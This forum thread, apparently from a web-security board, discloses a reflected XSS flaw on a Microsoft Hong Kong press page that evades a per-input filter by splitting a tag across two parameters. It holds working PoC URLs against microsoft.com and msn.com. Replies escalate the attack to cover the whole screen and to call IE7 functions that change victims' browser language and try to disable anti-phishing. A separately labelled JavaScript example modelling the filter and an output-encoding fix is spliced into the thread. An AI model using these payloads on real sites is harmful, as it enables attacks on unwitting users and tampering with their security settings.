I discovered a Microsoft webpage that blacklists a special character combination in its input: any English letter (a-z) followed by a left angle bracket (<) is not allowed, and # followed by & is not allowed either; apart from that, it allows any input. That means we cannot construct any valid HTML tag directly. Is it secure? No, it isn't. The webpage filters our input only. Microsoft, are you kidding? The browser renders your output.

The webpage accepts two inputs; the server appends the character T after the first one, then appends the second string after that T. That means we can add a left angle bracket at the end of the first string to construct a valid HTML tag starting with <T, and put the rest of the tag at the beginning of the second string.

Here is the PoC:
It works on my IE6 and FF1.5.
Move your mouse over the textarea.
http://www.microsoft.com/hk/presspass/chinese/result.aspx?fm=01/01/2006T12/14/2006%22%3e%3c/script%3e%3c&to=extarea%20cols=1000%20rows=1000%20onmouseover=%22javascript:alert%28%27xss%27%29

Even though it is obscure, it should be easy to exploit.
I have tried using the Table and TD background vuln, but it doesn't work in my IE6; does anyone know why?
I would be glad to see anyone exploit it without interaction.
I am sorry that the webpage is in Chinese; I haven't tested the English version.
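As an added example that is not part of the original post and not any of the site's own code, the following JavaScript models the filter and the server-side concatenation described above, and shows why checking each input on its own does not protect the rendered output. Two things are assumptions rather than facts from the post: its wording on the filter is ambiguous, and the posted PoC only gets through if the check is on a `<` immediately followed by a letter (and an `&` immediately followed by `#`), so that is what the model implements; and the two values are assumed to land inside an `<input>` attribute. The payload strings, the hardened renderer, and every function name (`inputFilterAllows`, `renderVulnerable`, `renderHardened`, `htmlEncode`, `containsTextareaHandler`, `demonstrate`) are constructed for this example.

```javascript
// Added example, not code from the original post. Models the input filter and
// the "first value + T + second value" concatenation the post describes.

// Filter as modelled from the post (assumption: '<' followed by a letter is
// rejected, and '&' followed by '#' is rejected; a bare trailing '<' passes).
function inputFilterAllows(value) {
  return !/<[A-Za-z]/.test(value) && !/&#/.test(value);
}

// Server behaviour from the post: first value, the character T, second value,
// dropped into the page. The <input> attribute context is an assumption.
function renderVulnerable(fm, to) {
  return '<input name="range" value="' + fm + 'T' + to + '">';
}

// Minimal HTML encoder for text and attribute values. Encoding at output time
// neutralises the assembled string no matter how the inputs were split,
// which is the point the post makes: the browser renders the output.
function htmlEncode(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return value.replace(/[&<>"']/g, (c) => map[c]);
}

function renderHardened(fm, to) {
  return '<input name="range" value="' + htmlEncode(fm) + 'T' + htmlEncode(to) + '">';
}

// Detector for the gadget the PoC builds: a textarea element carrying an
// onmouseover handler. Tag names are case-insensitive, so "Textarea" counts.
function containsTextareaHandler(html) {
  return /<textarea\b[^>]*\bonmouseover\s*=/i.test(html);
}

// Constructed payload, split the way the post describes: the first value ends
// with '<', the second supplies the rest of the tag name after the server's T.
const FM_PAYLOAD = '01/01/2006T12/14/2006"><';
const TO_PAYLOAD = 'extarea cols=1000 rows=1000 onmouseover="alert(\'xss\')';

// Runs the whole scenario and returns the facts worth checking.
function demonstrate(fm = FM_PAYLOAD, to = TO_PAYLOAD) {
  const assembled = fm + 'T' + to;
  return {
    // Each half passes the per-input filter on its own...
    fmPassesFilter: inputFilterAllows(fm),
    toPassesFilter: inputFilterAllows(to),
    // ...but the same filter run over the assembled string sees "<T" and
    // rejects it: the check was applied at the wrong point.
    assembledPassesFilter: inputFilterAllows(assembled),
    // The unencoded output carries a live <Textarea ... onmouseover=...>.
    vulnerableOutputExploitable: containsTextareaHandler(renderVulnerable(fm, to)),
    // Output encoding turns the '<' into &lt; and the tag never forms.
    hardenedOutputExploitable: containsTextareaHandler(renderHardened(fm, to)),
  };
}

console.log(JSON.stringify(demonstrate(), null, 2));
```

The takeaway is the one the post makes: a blacklist that only ever sees one fragment at a time cannot reason about what the page will contain, because the server assembles the fragments afterwards. Encoding at the point where untrusted data is written into HTML (`renderHardened`) does not depend on how the data was split up.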

Nice find, Hong! I bet this can be modified to not require user interaction, like you suspected. I think you have found only the second XSS issue in Microsoft ever posted on the boards. They tend to be very secure.

Very nice find... they seem to employ some very extensive QA for their microsoft.com domain. And the third, actually, counting yourself and thomaspollet.

I don't think the same team secures their other domains though; subdomains in live.com, xbox.com, and http://ie.search.msn.com/migrate.asp?SERVER=%3C/script%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx still have XSS (the msn one was previously disclosed by someone else).

If you use something like http://www.microsoft.com/hk/presspass/chinese/result.aspx?fm=01/01/2006T12/14/2006%22%3e%3c/script%3e%3c&to=extarea%20cols=1000%20rows=1000%20style=%22position:%20absolute;%20top:%200px;%20left:%200px;%22%20onmouseover=%22alert%28%27xss%27%29
then the user interaction is easier to trigger (basically it makes the textarea fill the whole screen).

There's an interesting idea, put forward by maluc in an earlier post, with the restriction that the XSS had to come from a Microsoft domain. Just thought I'd mention this as a possible use of this XSS. I'm sure there are quite a lot of things you are able to do from here with the IE7 javascript features.

Yeah, whenever you first install IE7 it takes you to a microsoft.com page to set up the anti-phishing options, among other things. If you look in the MSDN, there are a couple of special javascript functions that can turn the victim's anti-phishing stuff off, but only if the function is called from the microsoft.com domain. This XSS should be able to utilize those; I'll have to test.

I guess I should've posted it here instead of in a MySpace thread, so moved:

Okay, I tested it and you are able to set any language you wish as the default language for IE7 using this link:
http://www.microsoft.com/hk/presspass/chinese/result.aspx?fm=01/01/2006T12/14/2006%22%3e%3c/script%3e%3c&to=%20style=%22xx:expression(window.external.CustomizeSettings(false,false,'is-is')%29

Go to http://www.google.com afterwards to verify the change (to Icelandic). It's also set to disable the anti-phishing toolbar, but that doesn't seem to have any effect :/

You can, however, determine whether or not they use the anti-phishing filter with:
if(window.external.PhishingEnabled()) alert('its enabled');

Both of those can only be called from a sub.microsoft.com domain (so msdn.microsoft.com will work too)